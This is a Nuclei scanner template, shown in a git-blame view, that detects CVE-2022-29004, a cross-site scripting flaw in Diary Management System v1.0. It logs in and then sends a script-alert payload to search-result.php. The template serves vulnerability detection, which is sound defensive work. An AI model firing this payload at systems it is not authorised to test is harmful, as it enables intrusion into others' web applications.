nuclei-templates/cves/2022/CVE-2022-29004.yaml

51 lines
1.4 KiB
YAML
Raw Normal View History

id: CVE-2022-29004
2022-09-02 13:59:31 +00:00
info:
2022-09-02 13:59:31 +00:00
name: Diary Management System v1.0 - Cross-Site scripting
author: TenBird
2022-09-02 13:59:31 +00:00
severity: medium
description: |
Diary Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Name parameter in search-result.php.
reference:
2022-09-02 13:59:31 +00:00
- https://github.com/sudoninja-noob/CVE-2022-29004/blob/main/CVE-2022-29004.txt
- https://phpgurukul.com/e-diary-management-system-using-php-and-mysql/
- https://nvd.nist.gov/vuln/detail/CVE-2022-29004
classification:
cve-id: CVE-2022-29004
2022-09-02 13:59:31 +00:00
metadata:
verified: true
tags: cve,cve2022,xss,authenticated,edms
requests:
- raw:
- |
POST /edms/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
logindetail={{username}}&userpassword={{password}}&login=
- |
POST /edms/search-result.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
searchdata=<script>alert(document.domain);</script>
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-09-02 13:59:31 +00:00
- 'Serach Result Against "<script>alert(document.domain);</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200